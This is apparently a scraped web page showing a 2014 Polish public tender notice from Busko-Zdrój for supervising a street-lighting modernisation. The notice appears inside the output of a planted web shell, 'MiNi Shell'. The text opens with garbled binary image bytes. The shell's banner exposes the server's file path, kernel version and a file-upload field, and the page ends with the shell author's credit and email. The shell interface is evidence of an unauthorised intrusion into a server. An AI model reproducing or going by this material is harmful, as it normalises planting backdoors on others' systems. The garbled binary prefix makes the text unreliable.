JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141121/241957-N-2014.html

<p class="kh_header"><b>Busko-Zdrój: Pełnienie funkcji inspektora nadzoru inwestorskiego nad zadaniem: *Modernizacja systemu oświetlenia ulicznego w gminie Busko-Zdrój*</b><br>
<b>Numer ogłoszenia: 241957 - 2014; data zamieszczenia: 21.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy , ul. Adama Mickiewicza 10, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3705200, faks 041 3705290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.busko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego nad zadaniem: *Modernizacja systemu oświetlenia ulicznego w gminie Busko-Zdrój*.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na pełnieniu funkcji inspektora nadzoru inwestorskiego nad zadaniem: *Modernizacja systemu oświetlenia ulicznego w gminie Busko-Zdrój*. 
Zamawiający wymaga w szczególności zapewnienia ciągłego nadzoru inwestorskiego nad realizacją robót w specjalnościach instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
2. Pełnienie obowiązków inspektora nadzoru będzie obejmowało:
a)	pełnienie w sposób ciągły funkcji inspektora nadzoru nad wszelkimi robotami i pracami określonymi w dokumentacji technicznej zadania polegającego na modernizacji oświetlenia ulicznego na terenie Gminy Busko-Zdrój, 
b)	egzekwowanie od Wykonawcy robót budowlanych wymogów wynikających z Umowy na roboty, w okresie trwania robót budowlanych, mające na celu prawidłowe i terminowe wykonanie zadania,
c)	 pełnienie funkcji inspektora nadzoru inwestorskiego zgodnie z przepisami prawa,
d)	 przekazanie Zamawiającemu w dniu podpisania Umowy: uprawnień, aktualnych zaświadczeń o wpisie na listę członków Okręgowej Izby Inżynierów Budownictwa, oświadczeń o przejęciu obowiązków inspektora nadzoru inwestorskiego nad Projektem, zgodnie z art. 41 ustawy z dnia 7 lipca 1994 r - Prawo budowlane, numerów kontaktowych osób wymienionych w § 2 pkt 2 Umowy. Uprawnienia i zaświadczenie z OIIB należy przedstawić w postaci kserokopii poświadczonej za zgodność z oryginałem,
e)	reprezentowanie Zamawiającego podczas realizacji w/w zadania przez sprawowanie kontroli zgodności jej realizacji z dokumentacją techniczną, zasadami wiedzy technicznej, przepisami, sprawdzanie jakości wykonywanych robót i wbudowywanych wyrobów budowlanych,  odbieranie robót ulegających zakryciu i zanikających,
f)	przygotowanie protokołu do odbioru częściowego i końcowego robót, sprawdzenie kompletności i prawidłowości przedłożonych przez Wykonawcę robót dokumentów wymaganych do odbioru oraz uczestniczenie w odbiorze robót,
g)	potwierdzanie faktycznie wykonanych robót oraz usunięcia wad,
h)	 reprezentowanie Zamawiającego w kontaktach z osobami trzecimi w sprawach związanych z prowadzeniem robót,
i)	prowadzenie regularnych, potwierdzonych przez Zamawiającego  inspekcji na terenie budowy w celu sprawdzenia jakości wykonywanych robót oraz wbudowywanych materiałów,
j)	pełną koordynację działań w zakresie współpracy z projektantami, w przypadku 	wystąpienia jakichkolwiek trudności w realizacji robót budowlanych wg zatwierdzonej dokumentacji technicznej i konieczności zatwierdzenia rozwiązań zamiennych, zgodnie z wymaganiami specyfikacji dokumentacji technicznej oraz przepisami prawa,
k)	kontrolowanie przestrzegania przez Wykonawcę Robót zasad bezpieczeństwa pracy i utrzymania porządku podczas realizacji modernizacji oświetlenia,
l)	 kontrolę zgodności oznakowania robót z zatwierdzonym projektem tymczasowej organizacji ruchu,
m)	 monitorowanie postępu robót poprzez sprawdzania ich rzeczywistego zaawansowania i zgodności realizacji z obowiązującym harmonogramem robót,
n)	odbiór robót zanikających i ulegających zakryciu,
o)	sprawdzanie wykonanych robót i powiadomienie Wykonawcy Robót oraz Zamawiającego o wykrytych wadach, określenie zakresu koniecznych do wykonania robót poprawkowych,
p)	poświadczenie usunięcia przez Wykonawcę wad,
q)	poświadczenie terminu zakończenia robót,
r)	dopuszczenie materiałów i wszystkich elementów i urządzeń przewidzianych do wbudowania i wykorzystania przy realizacji robót,
s)	egzekwowanie od Wykonawcy robót realizacji inwestycji zgodnie z przedstawionym harmonogramem robót,
t)	wstrzymanie robót prowadzonych w sposób zagrażający bezpieczeństwu lub niezgodnie z przepisami prawa,
u)	kontrolę i zatwierdzanie wyników pomiarów, badań i prób przeprowadzonych przez Wykonawcę,
v)	wnioskowanie do Zamawiającego o zlecenie badań dodatkowych niezależnej firmie,
w)	kompletowanie i kontrola wszelkich dokumentów wymaganych od Wykonawcy robót,
x)	w przypadku odstąpienia od umowy sporządzenie szczegółowego protokołu robót w toku na dzień odstąpienia,
y)	obsługę okresu gwarancyjnego przez 12 miesięcy od daty odbioru końcowego.
3. Modernizacja oświetlenia ulicznego obejmuje w szczególności:
- wymianę linii napowietrznej AL na izolowaną AsXSn - ok. 126.550,00 m
- wymianę i dowieszenie opraw oświetleniowych - ok. 4931 szt.
- modernizacje punktów zapalania - ok. 159szt.
a w tym:
a) linie napowietrzne:
-demontaż opraw (odłączenie przewodów WLZ od oprawy, odkręcenie uchwytów  mocujących oprawę);
- demontaż WLZ (odłączenie przewodów zerowych i fazowych od sieci wraz z ich wyciągnięciem z
wysięgnika i zwinięciem);
- demontaż przewodu oświetleniowego Al (demontaż trzonów hakowych z izolatorami oraz przewodu oświetleniowego wraz z jego zwinięciem);
- demontaż wysięgników (demontaż konstrukcji lub haków mocujących wysięgnik);
- demontaż bezpieczników i zacisków;
- montaż haków wieszakowych na istniejących słupach;
- montaż uchwytów przelotowych, narożnych i końcowych;
- podwieszenie przewodu AsXSn 2x25 mm2 przy pomocy uchwytów;
- zainstalowanie bezpieczników izolowanych, zacisków (BZO, SL);
- zainstalowanie ograniczników przepięć;
- wciąganie w wysięgniki przewodów YKY 3 x 2,5 mm2;
- zainstalowanie wysięgników na słupach za pomocą haków ocynkowanych dla żerdzi ŻN, jarz ocynkowanych dla słupów wirowych zgodnie z przykładami zamieszczonymi w katalogu linii napowietrznych niskiego napięcia z przewodami samonośnymi na żerdziach wirowych i ŻN-LnNi -ENSTO; Wysięgnik należy zamontować nad linią energetyczną wysokość oraz kąt montażu wysięgnika zgodny z dokumentacją techniczną;
- zainstalowanie opraw na wysięgnikach (sprawną, sprawdzoną oprawę o odpowiednio dobranej  mocy zgodnie z dokumentacją projektową należy zamontować za pomocą wbudowanych uchwytów do wysięgnika); 
- podłączenie przewodów opraw do przewodów sieciowych;
- pomiary i badania linii oświetleniowej;
b) linie kablowe:
-demontaż opraw (odłączenie przewodów WLZ od oprawy, odkręcenie uchwytów mocujących oprawę;
-demontaż WLZ (odłączenie przewodów zerowych i fazowych od sieci wraz z ich wyciągnięciem z wysięgnika i zwinięciem);
- demontaż tabliczek słupowych;
- montaż IZK;
- wciąganie w słupy i wysięgniki przewodów YKY 3 x 2,5 mm2 ;
- zainstalowanie wysięgników na słupach;
- zainstalowanie opraw na wysięgnikach;
- podłączenie przewodów opraw do IZK;
- pomiary i badania linii oświetleniowej;
c) szafki pomiarowo - sterownicze:
- wyniesienie szafek pomiarowo-sterujących ze stacji trafo (wnętrzowej - przy ścianie stacji);
- wyniesienie szafek pomiarowo-sterujących ze stacji trafo (wnętrzowej - na zewnątrz w pasie drogi);
- wyniesienie szafek pomiarowo-sterujących ze stacji trafo (napowietrznej - na słup stacji);
- wyniesienie szafek pomiarowo-sterujących ze stacji trafo (napowietrznej - na słup oświetleniowy);
- wymiana istniejących szafek pomiarowo-sterujących na nowe; 
- remont istniejących szafek pomiarowo-sterujących;
- oprzewodowanie szafek pomiarowo sterujących wraz z montażem ograniczników przepięć i uziemień;  
- montaż sterowników w szafkach;
- oznakowanie szafek;
- wykonanie prób użytkowych i odbiorczych;
d) wycinka gałęzi drzew, krzaków lub drzew zasłaniających oprawy oświetleniowe wraz z ich utylizacją;
e) wykonanie inwentaryzacji geodezyjnej powykonawczej:
- wyniesienia szafek pomiarowo-sterujących ze stacji trafo (wnętrzowej - przy ścianie stacji);
- wyniesienia szafek pomiarowo-sterujących ze stacji trafo (wnętrzowej - na zewnątrz w pasie drogi);
f) zapoznanie się z terenem prowadzonych robót, oraz jeżeli zaistnieje konieczność naniesienie na istniejące schematy skrzyżowań z liniami SN i WN.
g) w razie konieczności odnowienie oznakowania słupów i latarni oświetleniowych.
h) prostowanie latarni i słupów oświetleniowych, oraz inne niezbędne prace konieczne do prawidłowego wykonania zamówienia.
4. Szczegółowy zakres prac i obowiązków uczestników procesu inwestycyjnego określają:
1)	dokumentacja techniczna, 
2)	przedmiary robót,
3)	specyfikacja techniczna wykonania i odbioru robót,
4)	specyfikacja istotnych warunków zamówienia na wykonanie zadania,
5)	wzór umowy z Wykonawcą robot budowlanych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 głównej usługi polegającej na pełnieniu funkcji inspektora nadzoru nad robotami budowlanymi w branży elektrycznej w zakresie budowy, przebudowy, remontu lub modernizacji oświetlenia ulicznego/parkowego o wartości robót co najmniej: 500.000,00 zł brutto;
wraz z podaniem wartości, przedmiotu, daty wykonania i podmiotu, na rzecz którego usługa została wykonana oraz załączenie dowodu, czy usługa została wykonana należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że przy realizacji zamówienia będzie dysponował min. 1 osobą posiadającą uprawnienia budowlane w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych 
wraz z oświadczeniem, że osoba ta posiada wymagane uprawnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy z wykorzystaniem wzoru wg Załącznika 1</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - nadzór nad robotami budowlanymi w branży elektrycznej w dofinansowanymi ze środków zewnętrznych - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące okoliczności i warunki zmiany postanowień zawartej umowy.
1. Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności.
2.	Zmiana terminu wykonania przedmiotu umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, może nastąpić w przypadkach, gdy ulegnie zmianie termin wykonania i rozliczenia robót budowlanych zadania.
3.	Zmiana treści umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, może nastąpić w przypadku konieczności zastąpienia osób wyznaczonych do pełnienia funkcji inspektora nadzoru nowymi osobami - zgodnie z procedurą opisaną we wzorze Umowy § 2 pkt 4-5.
4.	Zmiana wartości przedmiotu umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, może nastąpić w przypadku urzędowych zmian w obowiązujących przepisach podatkowych, w tym zmiany w podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umig.busko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko - Zdrój, pok. nr 36C.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2014 godzina 10:00, miejsce: Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko - Zdrój, pok. nr 3 (Biuro Obsługi Interesanta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com